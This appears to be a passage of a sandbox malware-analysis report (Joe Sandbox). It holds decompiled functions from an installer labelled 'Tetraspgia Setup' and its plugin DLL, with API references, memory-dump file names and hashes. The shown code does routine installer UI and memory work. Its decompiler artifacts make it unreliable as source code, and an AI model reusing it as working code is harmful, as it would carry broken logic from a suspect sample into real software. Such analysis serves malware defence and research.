					_t19 =  <  ?  *0x40d96c : _t18;
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv( <  ?  *0x40d96c : _t18, "true", _t18));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x0040365f
0x0040367c
0x00000000
0x00000000
0x00403661
0x0040366d
0x0040367e
0x0040367e
0x0040368b
0x004036a5
0x004036b5
0x004036c7
0x004036c7
0x004036cf

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 0040366D
MulDiv.KERNEL32(000923B8,?,000923B8), ref: 00403695
wsprintfW.USER32 ref: 004036A5
SetWindowTextW.USER32(?,?), ref: 004036B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004036C7

Strings

verifying installer: %d%%, xrefs: 0040369F

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 7999ebd0115e22dc8382da0543a4734c08260491a853317dea2dbb1df602252a
Instruction ID: 5c883eac817cb3b9f0e850005900bd2bca04ae763b88d1ec11a0ecb90196ae4f
Opcode Fuzzy Hash: 7999ebd0115e22dc8382da0543a4734c08260491a853317dea2dbb1df602252a
Instruction Fuzzy Hash: 87013671940209BBDF249FA0DD49FAA3B78A700705F008439F606B51E1DBB59A55CF59

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC2209 Relevance: 9.1, APIs: 6, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6ECC2209(intOrPtr* _a4) {
				intOrPtr* _t23;
				signed int _t24;
				intOrPtr _t25;
				intOrPtr _t33;
				void* _t39;
				void* _t42;

				_t39 = E6ECC12F8();
				_t23 = _a4;
				_t33 =  *((intOrPtr*)(_t23 + 0x1014));
				_t42 = (_t33 + 0x81 << 5) + _t23;
				do {
					if( *((intOrPtr*)(_t42 - 4)) >= 0) {
					}
					_t24 =  *(_t42 - 8) & 0x000000ff;
					if(_t24 <= 7) {
						switch( *((intOrPtr*)(_t24 * 4 +  &M6ECC2331))) {
							case 0:
								 *_t39 = 0;
								goto L17;
							case 1:
								__edx =  *__edx;
								if(__ecx > 0) {
									__ecx = __ecx - 1;
									__ecx = __ecx *  *(0x6ecc4064 + __eax * 4);
									asm("sbb eax, eax");
									__edx = __edx &  *(0x6ecc4084 + __eax * 4);
								}
								_push(__edx);
								goto L15;
							case 2:
								_push(__edi);
								_push(__edx[1]);
								_push( *__edx);
								__eax = E6ECC149E(__ecx);
								goto L16;
							case 3:
								__ecx =  *0x6ecc5040;
								__ecx - 1 = MultiByteToWideChar(0, 0,  *__edx, __ecx, __edi, __ecx - 1);
								__eax =  *0x6ecc5040;
								__ecx = 0;
								 *((short*)(__edi + __eax * 2 - 2)) = __cx;
								goto L17;
							case 4:
								__eax = lstrcpynW(__edi,  *__edx,  *0x6ecc5040);
								goto L17;
							case 5:
								_push( *0x6ecc5040);
								_push(__edi);
								_push( *__edx);
								__imp__StringFromGUID2();
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfW(__edi, 0x6ecc4058);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					if( *(_t42 + 0x14) != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t42 - 4)) > 0)) {
						GlobalFree( *(_t42 + 0x14));
					}
					_t25 =  *((intOrPtr*)(_t42 + 0xc));
					if(_t25 != 0) {
						if(_t25 != 0xffffffff) {
							if(_t25 > 0) {
								E6ECC1638(_t25 - 1, _t39);
								goto L26;
							}
						} else {
							E6ECC15EB(_t39);
							L26:
						}
					}
					_t42 = _t42 - 0x20;
					_t33 = _t33 - 1;
				} while (_t33 >= 0);
				return GlobalFree(_t39);
			}

0x6ecc2211
0x6ecc2213
0x6ecc2217
0x6ecc2226
0x6ecc2228
0x6ecc222d
0x6ecc222d
0x6ecc2235
0x6ecc223c
0x6ecc2242
0x00000000
0x6ecc224b
0x00000000
0x00000000
0x6ecc2253
0x6ecc2257
0x6ecc2259
0x6ecc225a
0x6ecc2265
0x6ecc2269
0x6ecc2269
0x6ecc2270
0x00000000
0x00000000
0x6ecc2273
0x6ecc2274
0x6ecc2277
0x6ecc2279
0x00000000
0x00000000
0x6ecc2280
0x6ecc2292
0x6ecc2298
0x6ecc229d
0x6ecc229f
0x00000000
0x00000000
0x6ecc22c0
0x00000000
0x00000000
0x6ecc22a6
0x6ecc22ac
0x6ecc22ad
0x6ecc22af
0x00000000
0x00000000
0x6ecc22c8
0x6ecc22ca
0x6ecc22d0
0x6ecc22d6
0x6ecc22d6
0x00000000
0x00000000
0x6ecc2242
0x6ecc22d9
0x6ecc22dd
0x6ecc22f1
0x6ecc22f1
0x6ecc22f7
0x6ecc22fc
0x6ecc2301
0x6ecc230d
0x6ecc2312
0x00000000
0x6ecc2317
0x6ecc2303
0x6ecc2304
0x6ecc2318
0x6ecc2318
0x6ecc2301
0x6ecc2319
0x6ecc231c
0x6ecc231c
0x6ecc232f

APIs

Part of subcall function 6ECC12F8: GlobalAlloc.KERNEL32(?,?,6ECC11C4,-000000A0), ref: 6ECC1302

GlobalFree.KERNEL32(00000000), ref: 6ECC22F1
GlobalFree.KERNEL32(00000000), ref: 6ECC2326

Memory Dump Source

Source File: 00000000.00000002.15063213998.000000006ECC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.15063182408.000000006ECC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063255603.000000006ECC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063283859.000000006ECC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_EL378_SPEC.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: eaddf03d389d7b36ed0ffd0a02c1972babf6d8defc971b80d5ca94a3fef1288a
Instruction ID: f7d7722abdae9826b5146b4bb54a965ef066f0fb3d15e0abd276cec16147d101
Opcode Fuzzy Hash: eaddf03d389d7b36ed0ffd0a02c1972babf6d8defc971b80d5ca94a3fef1288a
Instruction Fuzzy Hash: 77312231144901DFDB298FEADA68F6AB7B8FF46F21F005428F411C7150E7318886DB62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC10C7 Relevance: 8.9, APIs: 7, Instructions: 162
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6ECC10C7(void* _a8, intOrPtr _a12, void* _a16, intOrPtr _a20) {
				signed int _v0;
				signed int _t31;
				void* _t32;
				signed int _t34;
				void* _t39;
				void* _t46;
				intOrPtr _t55;
				void* _t59;
				void* _t66;
				void* _t67;
				signed short _t70;
				void* _t71;
				void* _t78;
				signed short _t79;
				void* _t83;
				void* _t85;
				void* _t86;
				void* _t88;
				signed int _t89;
				void* _t91;
				void _t94;
				void _t95;
				void* _t96;
				void* _t98;
				void* _t100;

				 *0x6ecc5040 = _a8;
				 *0x6ecc503c = _a16;
				 *0x6ecc5038 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x6ecc5014, E6ECC132B, _t85, _t88);
				_t89 =  *0x6ecc5040 * 0x28;
				_v0 = _t89;
				_t96 = E6ECC1593();
				_a8 = _t96;
				_t86 = _t96;
				_t70 = _v0 & 0x0000ffff;
				if(_t70 != 0) {
					_t83 = 0xa;
					do {
						_t31 = _t70 & 0x0000ffff;
						_t86 = _t86 + 2;
						_t100 = _t31 - 0x66;
						if(_t100 > 0) {
							_t32 = _t31 - 0x6c;
							if(_t32 == 0) {
								goto L24;
							} else {
								_t39 = _t32 - 4;
								if(_t39 == 0) {
									goto L13;
								} else {
									_t46 = _t39;
									if(_t46 == 0) {
										goto L11;
									} else {
										goto L8;
									}
								}
							}
						} else {
							if(_t100 == 0) {
								_t78 =  *0x6ecc503c;
								_t91 =  *_t78;
								 *_t78 =  *_t91;
								_t79 = _v0;
								_t55 =  *((intOrPtr*)(_t79 + 0xc));
								_a12 = _t55;
								if( *((intOrPtr*)(_t91 + 4)) == 0x2691) {
									E6ECC132E(_t79, _t91 + 8, "true");
									_t79 = _v0;
									_t98 = _t98 + 0xc;
									_t55 = _a12;
								}
								 *((intOrPtr*)(_t79 + 0xc)) = _t55;
								GlobalFree(_t91);
								goto L16;
							} else {
								_t59 = _t31 - 0x46;
								if(_t59 == 0) {
									_t95 = GlobalAlloc("true", 8 +  *0x6ecc5040 * 2);
									 *((intOrPtr*)(_t95 + 4)) = 0x2691;
									E6ECC132E(_t95 + 8, _v0, "true");
									 *_t95 =  *( *0x6ecc503c);
									 *( *0x6ecc503c) = _t95;
									goto L15;
								} else {
									_t66 = _t59 - 6;
									if(_t66 == 0) {
										L24:
										_t33 =  *0x6ecc5010;
										if( *0x6ecc5010 != 0) {
											E6ECC132E( *0x6ecc5038, _t33 + 4, _t89);
											_t71 =  *0x6ecc5010;
											_t98 = _t98 + 0xc;
											 *0x6ecc5010 =  *_t71;
											GlobalFree(_t71);
											goto L26;
										}
									} else {
										_t67 = _t66 - 4;
										if(_t67 == 0) {
											 *_t86 =  *_t86 + _t83;
											L13:
											GlobalFree(E6ECC15EB(E6ECC1548(( *_t86 & 0x0000ffff) - 0x30)));
											_t86 = _t86 + 2;
											goto L26;
										} else {
											_t46 = _t67;
											if(_t46 == 0) {
												 *_t86 =  *_t86 + _t83;
												L11:
												GlobalFree(E6ECC1638(( *_t86 & 0x0000ffff) - 0x30, E6ECC1593()));
												_t86 = _t86 + 2;
												goto L16;
											} else {
												L8:
												if(_t46 == 1) {
													_t94 = GlobalAlloc("true", _t89 + 4);
													E6ECC132E(_t94 + 4,  *0x6ecc5038, _v0);
													 *_t94 =  *0x6ecc5010;
													 *0x6ecc5010 = _t94;
													L15:
													_t98 = _t98 + 0xc;
													L16:
													_t89 = _v0;
													L26:
													_t83 = 0xa;
												}
											}
										}
									}
								}
							}
						}
						_t34 =  *_t86 & 0x0000ffff;
						_t70 = _t34;
					} while (_t34 != 0);
					_t96 = _a8;
				}
				return GlobalFree(_t96);
			}

0x6ecc10cd
0x6ecc10d7
0x6ecc10e1
0x6ecc10f5
0x6ecc10f8
0x6ecc10ff
0x6ecc110e
0x6ecc1110
0x6ecc1114
0x6ecc1116
0x6ecc111d
0x6ecc1129
0x6ecc112a
0x6ecc112a
0x6ecc112d
0x6ecc1130
0x6ecc1133
0x6ecc1260
0x6ecc1263
0x00000000
0x6ecc1265
0x6ecc1265
0x6ecc1268
0x00000000
0x6ecc126e
0x6ecc126f
0x6ecc1272
0x00000000
0x6ecc1278
0x00000000
0x6ecc1278
0x6ecc1272
0x6ecc1268
0x6ecc1139
0x6ecc1139
0x6ecc1221
0x6ecc122c
0x6ecc1230
0x6ecc1232
0x6ecc1235
0x6ecc1238
0x6ecc1240
0x6ecc1249
0x6ecc124e
0x6ecc1251
0x6ecc1254
0x6ecc1254
0x6ecc1259
0x6ecc125c
0x00000000
0x6ecc113f
0x6ecc113f
0x6ecc1142
0x6ecc11ec
0x6ecc11f5
0x6ecc11ff
0x6ecc120c
0x6ecc1213
0x00000000
0x6ecc1148
0x6ecc1148
0x6ecc114b
0x6ecc127d
0x6ecc127d
0x6ecc1284
0x6ecc1291
0x6ecc1296
0x6ecc129c
0x6ecc12a2
0x6ecc12a7
0x00000000
0x6ecc12a7
0x6ecc1151
0x6ecc1151
0x6ecc1154
0x6ecc11b5
0x6ecc11b8
0x6ecc11cd
0x6ecc11cf
0x00000000
0x6ecc1156
0x6ecc1157
0x6ecc115a
0x6ecc1196
0x6ecc1199
0x6ecc11ae
0x6ecc11b0
0x00000000
0x6ecc115c
0x6ecc115c
0x6ecc115f
0x6ecc1175
0x6ecc1181
0x6ecc118c
0x6ecc118e
0x6ecc1215
0x6ecc1215
0x6ecc1218
0x6ecc1218
0x6ecc12a9
0x6ecc12ab
0x6ecc12ab
0x6ecc115f
0x6ecc115a
0x6ecc1154
0x6ecc114b
0x6ecc1142
0x6ecc1139
0x6ecc12ac
0x6ecc12af
0x6ecc12b1
0x6ecc12ba
0x6ecc12ba
0x6ecc12c5

APIs

GlobalAlloc.KERNEL32(?,?), ref: 6ECC116B
GlobalFree.KERNEL32(00000000), ref: 6ECC11AE
GlobalFree.KERNEL32(00000000), ref: 6ECC11CD
GlobalAlloc.KERNEL32(?,?), ref: 6ECC11E6
GlobalFree.KERNEL32 ref: 6ECC125C
GlobalFree.KERNEL32(?), ref: 6ECC12A7
GlobalFree.KERNEL32(00000000), ref: 6ECC12BF

Memory Dump Source

Source File: 00000000.00000002.15063213998.000000006ECC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.15063182408.000000006ECC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063255603.000000006ECC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063283859.000000006ECC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_EL378_SPEC.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 42560da7090fa55917a81e1300fe46f092075c87324e446fddae249f6acb5f62
Instruction ID: 4934338b1ecdc6e22403113e9fedaac716dbede61415002233bae53c2afdff36
Opcode Fuzzy Hash: 42560da7090fa55917a81e1300fe46f092075c87324e446fddae249f6acb5f62
Instruction Fuzzy Hash: 4851BE755006029FCB50CFAEC994A6A77F8FF4AB04B004929F969D7250E735E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00405560 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 90
stringCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00405560(signed int __ecx, intOrPtr _a8, signed int _a12, signed int _a16) {
				int _v12;
				char _v80;
				char _v136;
				signed int _t23;
				void* _t26;
				void* _t34;
				void* _t43;
				signed char _t45;
				signed int _t46;
				signed char _t50;
				signed int _t51;
				signed int _t53;
				signed int _t54;
				void* _t59;
				signed int _t61;
				signed int _t63;

				_t23 = _a16;
				_push("true");
				_pop(_t59);
				if(_t23 == 0) {
					_t54 = _a12;
					_t61 = _t54;
					_push("true");
					asm("sbb ecx, ecx");
					_pop(_t43);
					asm("sbb eax, eax");
					_t26 = 0xffffffde;
					_t59 =  <  ? _t26 : _t59 +  ~0x100000;
					_t45 =  >=  ? (__ecx & 0xfffffff6) + _t43 : 0;
					if(_t61 < 0xffff3333) {
						_push("true");
						asm("cdq");
						_pop(_t53);
						_t54 = _t61 + 1 / _t53;
					}
					_t50 = _t45;
					_t63 = _t54 >> _t50;
					_t51 = 0xa;
					_t46 = ((_t54 & 0x00ffffff) * 0xa >> _t50) % _t51;
				} else {
					_t63 = (_t23 << 0x00000020 | _a12) >> 0x14;
					_t46 = 0;
				}
				_push(_a8);
				_push(0x42bd48);
				E00405EBA();
				_push(0xffffffdf);
				_push( &_v136);
				_push(E00405EBA());
				_push(_t59);
				_t34 = E00405EBA();
				wsprintfW( &(0x42bd48[lstrlenW(0x42bd48)]), L"%u.%u%s%s", _t63, _t46, _t34,  &_v80);
				return SetDlgItemTextW( *0x4349dc, _v12, 0x42bd48);
			}

0x00405560
0x0040556e
0x00405570
0x00405573
0x00405584
0x00405590
0x00405599
0x0040559b
0x004055a0
0x004055a7
0x004055af
0x004055b0
0x004055b7
0x004055c0
0x004055c9
0x004055cb
0x004055cc
0x004055cf
0x004055cf
0x004055d4
0x004055dc
0x004055e7
0x004055ea
0x00405575
0x0040557c
0x00405580
0x00405580
0x004055ec
0x004055f8
0x004055f9
0x004055fe
0x00405604
0x0040560a
0x0040560b
0x00405611
0x0040562c
0x00405652

APIs

lstrlenW.KERNEL32(Tetraspgia Setup: Installing,%u.%u%s%s,?,00000000,00000000,?,?,00000000,?,000000DF,Tetraspgia Setup: Installing,?,?,?,?,?), ref: 0040561F
wsprintfW.USER32 ref: 0040562C
SetDlgItemTextW.USER32(?,Tetraspgia Setup: Installing), ref: 00405643

Strings

Tetraspgia Setup: Installing, xrefs: 004055F3, 004055F8, 0040561E, 00405635
%u.%u%s%s, xrefs: 00405619

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988969049.000000000045B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EL378_SPEC.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Tetraspgia Setup: Installing
API String ID: 3540041739-332494570
Opcode ID: b3da9a1244fcee535f9463e31d5d6ec72300bd819393bad9935e8733ca876ae6
Instruction ID: ddca7360d09b2edd05df8fb08f039e75c7842db061d31d06a5ac0fb1d0c25846
Opcode Fuzzy Hash: b3da9a1244fcee535f9463e31d5d6ec72300bd819393bad9935e8733ca876ae6
Instruction Fuzzy Hash: 072106337402242BD724A9799C40FAB729DDBC1364F01473AFD6AF31D1E9399C1885A4

Uniqueness

Uniqueness Score: -1.00%

Function 6ECC2049 Relevance: 7.6, APIs: 5, Instructions: 129
memoryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E6ECC2049(signed int _a4) {
				signed int _t44;
				void* _t45;
				signed int _t46;
				signed int _t50;
				void* _t54;
				signed int _t57;
				void* _t58;
				int _t59;

				_t50 = _a4;
				_t59 = 0;
				_t44 = 0 |  *((intOrPtr*)(_t50 + 0x1014)) > 0x00000000;
				while(1) {
					L1:
					_a4 = _t44;
					_t57 = _t44 << 5;
					_t58 =  *(_t57 + _t50 + 0x1030);
					if(_t58 == 0 || _t58 == 0x1a) {
						goto L8;
					}
					if(_t58 != 0xffffffff) {
						_t49 = _t58 - 1;
						if(_t58 - 1 > 0x18) {
							 *(_t57 + _t50 + 0x1030) = 0x1a;
							L11:
							_t54 = _t57 + _t50;
							if( *((intOrPtr*)(_t57 + _t50 + 0x101c)) >= _t59) {
							}
							_t46 =  *(_t57 + _t50 + 0x1018) & 0x000000ff;
							 *(_t57 + _t50 + 0x1034) =  *(_t57 + _t50 + 0x1034) & 0x00000000;
							if(_t46 > 7) {
								L26:
								_t59 = 0;
								goto L27;
							} else {
								switch( *((intOrPtr*)(_t46 * 4 +  &M6ECC21E9))) {
									case 0:
										_t59 = 0;
										 *((intOrPtr*)(_t54 + 0x1020)) = 0;
										goto L27;
									case 1:
										_push(__esi);
										__eax = E6ECC135A();
										goto L18;
									case 2:
										_push(__esi);
										__eax = E6ECC135A();
										_pop(__ecx);
										 *__ebp = __eax;
										_a4 = __edx;
										goto L26;
									case 3:
										__eax = GlobalAlloc("true",  *0x6ecc5040);
										 *(__edi + __ebx + 0x1034) = __eax;
										 *__ebp = __eax;
										__ebp = 0;
										__ecx =  *0x6ecc5040;
										__eax = WideCharToMultiByte(0, 0, __esi,  *0x6ecc5040, __eax,  *0x6ecc5040, 0, 0);
										goto L27;
									case 4:
										__eax = E6ECC12E1(__esi);
										 *(__edi + __ebx + 0x1034) = __eax;
										L18:
										_pop(__ecx);
										 *__ebp = __eax;
										goto L26;
									case 5:
										__eax = GlobalAlloc("true", "true");
										_push(__eax);
										 *(__edi + __ebx + 0x1034) = __eax;
										_push(__esi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										goto L26;
									case 6:
										__ebp = 0;
										if( *__esi != __bp) {
											_push(__esi);
											__eax = E6ECC135A();
											 *(__edi + __ebx + 0x1020) = __eax;
										}
										L27:
										_t47 = GlobalFree(_t58);
										_t55 = _a4;
										if(_t55 == 0) {
											return _t47;
										}
										_t53 =  !=  ? _t55 + 1 : 0;
										_t44 =  !=  ? _t55 + 1 : 0;
										goto L1;
									case 7:
										__ecx =  *(__edi + __ebx + 0x1030);
										__eax =  *0x6ecc5038;
										 *(__edi + __ebx + 0x1030) - 1 = ( *(__edi + __ebx + 0x1030) - 1) *  *0x6ecc5040;
										__ecx =  *0x6ecc5038 + ( *(__edi + __ebx + 0x1030) - 1) *  *0x6ecc5040 * 2;
										__eax = __ecx + 0x18;
										 *(__edx + 0x1020) = __eax;
										_push(__ecx);
										asm("cdq");
										_push(__edx);
										_push(__eax);
										__eax = E6ECC149E(__ecx);
										__esp = __esp + 0xc;
										goto L26;
								}
							}
						}
						_t45 = E6ECC1548(_t49);
						L9:
						L10:
						_t58 = _t45;
						goto L11;
					}
					_t45 = E6ECC1593();
					goto L10;
					L8:
					_t45 = E6ECC12E1(0x6ecc40e0);
					goto L9;
				}
			}

0x6ecc204a
0x6ecc2051
0x6ecc205b
0x6ecc205e
0x6ecc205e
0x6ecc2060
0x6ecc2064
0x6ecc2067
0x6ecc2070
0x00000000
0x00000000
0x6ecc207a
0x6ecc2083
0x6ecc2089
0x6ecc2093
0x6ecc20ad
0x6ecc20ad
0x6ecc20b7
0x6ecc20b7
0x6ecc20c7
0x6ecc20cf
0x6ecc20da
0x6ecc21bc
0x6ecc21bc
0x00000000
0x6ecc20e0
0x6ecc20e0
0x00000000
0x6ecc20e7
0x6ecc20e9
0x00000000
0x00000000
0x6ecc20f4
0x6ecc20f5
0x00000000
0x00000000
0x6ecc2103
0x6ecc2104
0x6ecc2109
0x6ecc210a
0x6ecc210d
0x00000000
0x00000000
0x6ecc212c
0x6ecc2132
0x6ecc2139
0x6ecc213c
0x6ecc213e
0x6ecc214c
0x00000000
0x00000000
0x6ecc2116
0x6ecc211b
0x6ecc20fa
0x6ecc20fa
0x6ecc20fb
0x00000000
0x00000000
0x6ecc2158
0x6ecc215e
0x6ecc215f
0x6ecc2166
0x6ecc2167
0x6ecc216a
0x00000000
0x00000000
0x6ecc2172
0x6ecc2177
0x6ecc2179
0x6ecc217a
0x6ecc2187
0x6ecc2187
0x6ecc21be
0x6ecc21bf
0x6ecc21c5
0x6ecc21cb
0x6ecc21e6
0x6ecc21e6
0x6ecc21d8
0x6ecc21db
0x00000000
0x00000000
0x6ecc2190
0x6ecc2197
0x6ecc219d
0x6ecc21a4
0x6ecc21a7
0x6ecc21aa
0x6ecc21b0
0x6ecc21b1
0x6ecc21b2
0x6ecc21b3
0x6ecc21b4
0x6ecc21b9
0x00000000
0x00000000
0x6ecc20e0
0x6ecc20da
0x6ecc208c
0x6ecc20aa
0x6ecc20ab
0x6ecc20ab
0x00000000
0x6ecc20ab
0x6ecc207c
0x00000000
0x6ecc20a0
0x6ecc20a5
0x00000000
0x6ecc20a5

APIs

GlobalFree.KERNEL32(00000000), ref: 6ECC21BF

Part of subcall function 6ECC12E1: lstrcpynW.KERNEL32(00000000,?,6ECC156A,?,6ECC11C4,-000000A0), ref: 6ECC12F1

GlobalAlloc.KERNEL32(?), ref: 6ECC212C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6ECC214C

Memory Dump Source

Source File: 00000000.00000002.15063213998.000000006ECC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6ECC0000, based on PE: true

Associated: 00000000.00000002.15063182408.000000006ECC0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063255603.000000006ECC4000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.15063283859.000000006ECC6000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ecc0000_EL378_SPEC.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: bfd6ac80c7e3b47fb07e94eeafa5c9ecd2a66bcd8bf5114659231c597efb5d14
Instruction ID: 07f0fe0f788588fba0d5681580e26a6c16211fed9ad7e43aac199937b8055447
Opcode Fuzzy Hash: bfd6ac80c7e3b47fb07e94eeafa5c9ecd2a66bcd8bf5114659231c597efb5d14
Instruction Fuzzy Hash: F14127B1405A05EFC7089FAAC858AE977B8FB06B44B44423EF9589B149FB705981C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00401EFE Relevance: 7.6, APIs: 5, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00401EFE(struct HWND__* __edx, intOrPtr _a16, WCHAR* _a20, signed int _a24, signed int _a28, intOrPtr _a40, signed short _a44, int _a48, signed int _a52, struct tagRECT _a80, signed int _a88, signed int _a92) {
				intOrPtr _t21;

				GetDlgItem(__edx, _a48);
				__ebp = __eax;
				__eax = _a52;
				__eax = __eax >> 0x1e;
				_a28 = __eax & 0x00000004;
				__esi = __eax;
				__esi = __eax & 0x00000003;
				__ebx = __eax >> 0x0000001e & 0x00000001;
				_a24 = __eax >> 0x1f;
				if((__eax & 0x00010000) == 0) {
					__eax = _a44 & 0x0000ffff;
				} else {
					__eax = E0040303E(__edx, 0x11);
				}
				_a20 = __eax;
				 &_a80 = GetClientRect(__ebp,  &_a80);
				_a52 = _a52 & 0x0000fef0;
				_a92 = _a92 * __ebx;
				_a88 = _a88 * _a24;
				0 =  !=  ?  *0x4349f4 : 0;
				__ebx = LoadImageW( !=  ?  *0x4349f4 : 0, _a20, __esi, _a88 * _a24, _a92 * __ebx, _a52 & 0x0000fef0);
				__eax = SendMessageW(__ebp, 0x172, __esi, __ebx);
				if(__eax != 0 && __esi == 0) {
					__eax = DeleteObject(__eax);
				}
				if(_a40 >= 0) {
					_push(__ebx);
					E0040661F();
				}
				_t21 = _a16;
				 *0x435ac8 =  *0x435ac8 + _t21;
				return 0;
			}

0x00401f03
0x00401f09
0x00401f0b
0x00401f16
0x00401f19
0x00401f1d
0x00401f21
0x00401f27
0x00401f2a
0x00401f33
0x00401f3e
0x00401f35
0x00401f37
0x00401f37
0x00401f43
0x00401f4d
0x00401f57
0x00401f61
0x00401f69
0x00401f7a
0x00401f88
0x00401f92
0x00401f9a
0x00401fa1
0x00401fa1
0x00401fac
0x00401fb2
0x004016b7
0x004016b7
0x00402ea1
0x00402ea5
0x00402eb7

APIs

GetDlgItem.USER32(?,?), ref: 00401F03
GetClientRect.USER32(00000000,?), ref: 00401F4D
LoadImageW.USER32(00000000,?,?,?,?,?), ref: 00401F82
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401F92
DeleteObject.GDI32(00000000), ref: 00401FA1

Memory Dump Source

Source File: 00000000.00000002.14988488640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.14988453818.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988546500.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.14988579648.0000000000457000.00000004.00000001.01000000.00000003.sdmpDownload File
